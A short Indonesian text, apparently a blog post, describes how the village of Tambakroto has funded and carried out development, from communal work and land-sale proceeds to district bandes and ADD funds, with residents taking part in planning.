                                                  Manusia dalam hidupnya selalu mempunyai kecenderungan untuk mengubah peradaban. Peradaban ini berubah seiring dengan adanya pembangunan. Jadi pembangunan sudah dilaksanakan sejak zaman dahulu. Hanya saja yang menjadi sasaran dan kondisinya yang berbeda. Desa tambakroto pun sudah mulai membangun sejak dibukanya hutan menjadi sebuah desa. Secara berangsur-angsur pembangunan dilaksanakan oleh masyarakat desa Tambakroto. Pada mulanya pembangunan desa selalu dilaksanakan secara gotong royong. Namun, karena desakan kepentingan dan kemajuan zaman kondisi ini sudah tidak mutlak adanya.


                                                  Awalnya desa Tambakroto membiayai pembangunan desa dengan dana yang diperoleh dari hasil penjualan tanah kemakmuran desa. Dana itu dipakai untuk pembangunan jalan, saluran irigasi, seokolah, jembatan, dan sebagainya sesuai dengan prioritas yang mendesak saat itu. Sejak tahun delapan puluhan, desa Tambakroto mulai mendapat kucuran dana bandes dari pemerintah kabupaten. Dana dari desa dan pemkab dimasukan dalam pologoro desa untuk membiayai pembangunan desa. Dan kini desa Tambakroto maupun desa-desa lainnya menerima dana ADD dari Pemkab. Dana ini pun digunakan untuk pembangunan desa.

                                                  Untuk lebih memberdayakan masyarakat, pemerintah desa Tambakroto selalu mengikutsertakan masyarakat dalam perencanaan dan pelaksanaan pembangunan bahkan perawatannya. Masyarakat secara perwakilan diajak untuk bermusyawaran dalam pembangunan desa. Rupanya kebijakan ini dapat membuahkan hasil. Terbukti peran serta masyarakat cukup tinggi dalam pembangunan. Hal ini tampak dalam kesediaan masyarakat untuk berswadaya dalam kegiatan pembangunan.
                                                  sumber : http://kojahan.wordpress.com/